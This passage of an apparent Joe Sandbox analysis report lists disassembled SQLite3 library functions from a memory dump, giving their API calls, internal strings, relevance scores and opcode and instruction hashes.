                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E257C3 Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                                                              • Instruction ID: 25dfb324ada9b8d827261d8fc1d4b912609f3f6c075dd91ee7180dde6dfeef46
                                                                                              • Opcode Fuzzy Hash: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                                                              • Instruction Fuzzy Hash: 71D048B860530DABDB00CF0AD8C599ABBA8FB08264F50C11AED184B301C371EA608AA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E2572F Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                                                              • Instruction ID: c2bcc24d9a6a2a204a5e4335206f5f78de9ae970b412e7a113f8aaa7a3a88beb
                                                                                              • Opcode Fuzzy Hash: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                                                              • Instruction Fuzzy Hash: 0ED042B450530DABDB00CF05D8C099ABBA4FB08364F50C119ED1847301C371E9608AA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E03463 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cb4f879bfcccb7522fd65f63dedd66a79283a715b4d7212bc3d3df4af4cd11f5
                                                                                              • Instruction ID: 6b8630985ffb5f77c01c6e3b806b608482e538d18b38cbb61d7f295c408b3314
                                                                                              • Opcode Fuzzy Hash: cb4f879bfcccb7522fd65f63dedd66a79283a715b4d7212bc3d3df4af4cd11f5
                                                                                              • Instruction Fuzzy Hash: 8FC012302582088BEB40CAAEE480A6337E8BB08A24F10C064E848CB350DA30F8508680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E03451 Relevance: .0, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                              • Instruction ID: fb05888133f16e5b8e537a9cdaa5165041bf743facb95d40ab125013c9ba032c
                                                                                              • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                                                              • Instruction Fuzzy Hash: 8EB0922461421A8A6B08CE989480A7777AEBB88E05B29C465AD1C8AA05E731E89192C1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E0337A Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0f2384b3b752d3915b0886f45dcb5b5ae2c3673fd6f6a42dd7d82e2120c80962
                                                                                              • Instruction ID: d3f995c7ed1863e227637fada27606a3e1c89b9f632761dd9b80a54edcbf0309
                                                                                              • Opcode Fuzzy Hash: 0f2384b3b752d3915b0886f45dcb5b5ae2c3673fd6f6a42dd7d82e2120c80962
                                                                                              • Instruction Fuzzy Hash: EAB0123B11030CCB4700DA0DD441CC1B3D8F708E127C54098E40487711D669FC40C685
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E330D4 Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 244COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E331B7
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E331F5
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E33220
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33380
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E33398
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E333D7
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33453
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E33488
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E33504
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendf$sqlite3_str_appendall
                                                                                              • String ID: %s=?$0$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$d$rowid
                                                                                              • API String ID: 3937484358-3012697695
                                                                                              • Opcode ID: 194c141a75ac7c12ee9fb2557d25dc107d81505afb5aa22f27cce3f01245e96f
                                                                                              • Instruction ID: 29a9a076f04a100d4bbb23cab92074773634cc63b7ba0464e235d5b62a14debf
                                                                                              • Opcode Fuzzy Hash: 194c141a75ac7c12ee9fb2557d25dc107d81505afb5aa22f27cce3f01245e96f
                                                                                              • Instruction Fuzzy Hash: CFC118B4A087648BDB14DF24C981B9ABBF1AF89308F21C8ADD8989B351D775D981CF41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3E3A1 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 209COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E413
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3E444
                                                                                                • Part of subcall function 61E229CA: sqlite3_vsnprintf.SQLITE3 ref: 61E229EB
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E588
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E5C5
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3E600
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3E632
                                                                                              • sqlite3_randomness.SQLITE3 ref: 61E3E64E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                                                              • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                                                              • API String ID: 3041771859-3409217566
                                                                                              • Opcode ID: a266bb4901acd456ed87a040cdad1e71806653baa3e52d580abd4b5374e01830
                                                                                              • Instruction ID: ff77f28c386f8801ab57ef9aec9ca8bf3c118af290d36e5f79a993485cf82fb1
                                                                                              • Opcode Fuzzy Hash: a266bb4901acd456ed87a040cdad1e71806653baa3e52d580abd4b5374e01830
                                                                                              • Instruction Fuzzy Hash: BC8172B0608B56DBD7109F7AC49126EBBE1AFC9348F25C82DD4948B391E734CC42DB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E22F5B Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 189COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                              • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                              • API String ID: 3752053736-2111127023
                                                                                              • Opcode ID: efe8f659b37b31e3f986115abc2288d25001c83e9af795a0e660f00ca44b962c
                                                                                              • Instruction ID: 14d8b0f95f25926a0d043882a74c8c4729f184b26d5af2be3f8631151583d680
                                                                                              • Opcode Fuzzy Hash: efe8f659b37b31e3f986115abc2288d25001c83e9af795a0e660f00ca44b962c
                                                                                              • Instruction Fuzzy Hash: 0A7129B0A486498FD701EF69C49565EBBF1FF89348F24C82DE8998B351D738C8858F52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3AF88 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 284COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                              • String ID: .$sqlite3_extension_init$te3_
                                                                                              • API String ID: 2803375525-613441610
                                                                                              • Opcode ID: 3a3c4c572bb3daaccfaf72249e9f29d91946aa2bbec36b597ffda1571a183cb8
                                                                                              • Instruction ID: e2d94b7ac520e25f221ce0f0cb60013fc445c72f2a544f13005bab7d71078193
                                                                                              • Opcode Fuzzy Hash: 3a3c4c572bb3daaccfaf72249e9f29d91946aa2bbec36b597ffda1571a183cb8
                                                                                              • Instruction Fuzzy Hash: 5BC1F4B4A0475A9FDB00DFA8C480A9EBBF1BF88354F24C56EE8999B350D774D881CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E280B4 Relevance: 28.6, APIs: 19, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E280CE
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E280DA
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E280E7
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E2810F
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E2811B
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E2812A
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E2814A
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E28156
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E28165
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E28191
                                                                                              • sqlite3_value_numeric_type.SQLITE3 ref: 61E2819D
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E281AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                              • String ID:
                                                                                              • API String ID: 2723203140-0
                                                                                              • Opcode ID: 5740e0072960829592580233cdb2733f1eb5cdb6f53a50d6c9ff0e9792dbce64
                                                                                              • Instruction ID: 1f9a098080fa2857a0d5a9f5a029f5e61dd80e25b5b223aa03835b4c06656af9
                                                                                              • Opcode Fuzzy Hash: 5740e0072960829592580233cdb2733f1eb5cdb6f53a50d6c9ff0e9792dbce64
                                                                                              • Instruction Fuzzy Hash: D0412EB1508B468BC704AFA58591A6EBBF4BFC6748F30CD2DC8968B340E734D452AB41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3AAE5 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 342COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                                                              • String ID: @$access$cache
                                                                                              • API String ID: 1538829708-1361544076
                                                                                              • Opcode ID: c997ab8056be13ec9e78a7960e25e392d623d091625248bde7e05fd561fc6fc1
                                                                                              • Instruction ID: e418883ed0f11a8ff762c8bb32e17444d80cf029073bf746b3e0dc95d7e38367
                                                                                              • Opcode Fuzzy Hash: c997ab8056be13ec9e78a7960e25e392d623d091625248bde7e05fd561fc6fc1
                                                                                              • Instruction Fuzzy Hash: F3D15B709883658BDF15CFA9C48039ABBF2ABC9318F64C85DD895DB361D335D881CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E3EAC6 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 330COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EB13
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_snprintf.SQLITE3 ref: 61E3EB3F
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3EB4C
                                                                                              • sqlite3_mutex_alloc.SQLITE3 ref: 61E3EBA2
                                                                                              • sqlite3_uri_boolean.SQLITE3 ref: 61E3EBCA
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3EC5F
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E3EC7E
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E3EECF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mutex_enter$sqlite3_free$sqlite3_mutex_allocsqlite3_mutex_leavesqlite3_snprintfsqlite3_uri_boolean
                                                                                              • String ID: winOpenShm$winShmMap1$winShmMap2$winShmMap3
                                                                                              • API String ID: 1420044521-1629717226
                                                                                              • Opcode ID: aa678a3cd3b48fdd14c26ddc3a87e1c1cd3ffcb0d88e243161efec145edf26be
                                                                                              • Instruction ID: 8f8e1c464887fa363333707d60a8f0bbe9561a2f98a5296fd5d00449813b2ec4
                                                                                              • Opcode Fuzzy Hash: aa678a3cd3b48fdd14c26ddc3a87e1c1cd3ffcb0d88e243161efec145edf26be
                                                                                              • Instruction Fuzzy Hash: A4E113B4A04B559FDB04DF6AC484A5ABBF1BF89308F25C86EE8488B355D734DC41CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 61E31FF0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 219COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3208E
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E320A4
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E320E9
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32113
                                                                                                • Part of subcall function 61E25B49: sqlite3_str_vappendf.SQLITE3 ref: 61E25B63
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32176
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3221C
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E322C4
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E322FC
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32321
                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E3235A
                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E3237A
                                                                                              • sqlite3_str_reset.SQLITE3 ref: 61E32396
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
